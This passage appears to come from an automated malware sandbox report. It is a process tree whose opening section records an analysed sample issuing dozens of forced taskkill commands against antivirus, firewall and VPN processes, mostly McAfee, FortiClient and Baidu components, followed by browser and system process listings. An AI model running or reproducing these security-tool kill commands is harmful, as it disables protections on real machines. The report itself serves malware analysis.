        taskkill /IM SBAMTray.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:180
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SBPIMSvc.exe /T /F
        5⤵
        
        PID:6640
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM bavhm.exe /T /F
        5⤵
        
        PID:1268
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BavSvc.exe /T /F
        5⤵
        
        PID:1276
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BavTray.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:4492
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM Bav.exe /T /F
        5⤵
        
        PID:1488
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BavWebClient.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7084
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BavUpdater.exe /T /F
        5⤵
        
        PID:940
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MCShieldCCC.exe /T /F
        5⤵
        
        PID:1036
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MCShieldRTM.exe /T /F
        5⤵
        
        PID:4340
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MCShieldDS.exe /T /F
        5⤵
        
        PID:7012
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MCS-Uninstall.exe /T /F
        5⤵
        
        PID:5500
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SDScan.exe /T /F
        5⤵
        
        PID:972
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SDFSSvc.exe /T /F
        5⤵
        
        PID:6088
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SDWelcome.exe /T /F
        5⤵
        
        PID:1288
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SDTray.exe /T /F
        5⤵
        
        PID:5988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM UnThreat.exe /T /F
        5⤵
        
        PID:6988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM utsvc.exe /T /F
        5⤵
        
        PID:3092
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiClient.exe /T /F
        5⤵
        
        PID:6520
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fcappdb.exe /T /F
        5⤵
        
        PID:5724
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FCDBlog.exe /T /F
        5⤵
        
        PID:7152
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FCHelper64.exe /T /F
        5⤵
        
        PID:6472
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fmon.exe /T /F
        5⤵
        
        PID:6748
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiESNAC.exe /T /F
        5⤵
        
        PID:5488
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiProxy.exe /T /F
        5⤵
        
        PID:6240
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiSSLVPNdaemon.exe /T /F
        5⤵
        
        PID:6916
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiTray.exe /T /F
        5⤵
        
        PID:1852
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiFW.exe /T /F
        5⤵
        
        PID:1328
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
        5⤵
        
        PID:6888
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM av_task.exe /T /F
        5⤵
        
        PID:5508
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM CertReg.exe /T /F
        5⤵
        
        PID:4948
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FilMsg.exe /T /F
        5⤵
        
        PID:3512
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FilUp.exe /T /F
        5⤵
        
        PID:6560
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM filwscc.exe /T /F
        5⤵
        
        PID:6280
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM filwscc.exe /T /F
        5⤵
        
        PID:6500
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM psview.exe /T /F
        5⤵
        
        PID:5724
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM quamgr.exe /T /F
        5⤵
        
        PID:216
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM quamgr.exe /T /F
        5⤵
        
        PID:3068
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM schmgr.exe /T /F
        5⤵
        
        PID:6776
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM schmgr.exe /T /F
        5⤵
        
        PID:6748
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM twsscan.exe /T /F
        5⤵
        
        PID:2304
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM twssrv.exe /T /F
        5⤵
        
        PID:3108
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM UserReg.exe /T /F
        5⤵
        
        PID:3848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:8
1⤵
PID:2748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcba06ab58,0x7ffcba06ab68,0x7ffcba06ab78
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:2
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2300 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:3248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:2056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4288 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3992 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4480 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4532 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4968 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:6756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4208 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:5368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4012 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:6088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3088 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5200 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1976 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:3672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1692 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:5644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1508 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:6948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2660 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:8
  2⤵
  PID:6612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4344 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:6348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4692 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=2688 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5396 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=1976 --field-trial-handle=1992,i,3941046943413854956,15674060407385148254,131072 /prefetch:1
  2⤵
  PID:6776

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
PID:6100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4588,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:1
1⤵
PID:6124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4148,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3756 /prefetch:1
1⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=4124,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:1
1⤵
PID:5244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5332,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5344 /prefetch:8
1⤵
PID:776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5352,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:8
1⤵
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6056,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6132 /prefetch:8
1⤵
PID:5828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=3596,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:1
1⤵
PID:5760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6224,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=1388 /prefetch:1
1⤵
PID:5796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6480,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:1
1⤵
PID:6112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4744 /prefetch:8
1⤵
PID:5244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffcb30dceb8,0x7ffcb30dcec4,0x7ffcb30dced0
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2284,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:2
  2⤵
  PID:5700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:3
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2380,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:8
  2⤵
  PID:5504
- C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4344,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4344,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4704,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  PID:6648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4712,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:8
  2⤵
  PID:6736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4620,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4188,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:8
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3740,i,4558573999738513859,13526958156554611547,262144 --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
  2⤵
  PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
1⤵
PID:3528

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6320

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6916

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.log
1⤵
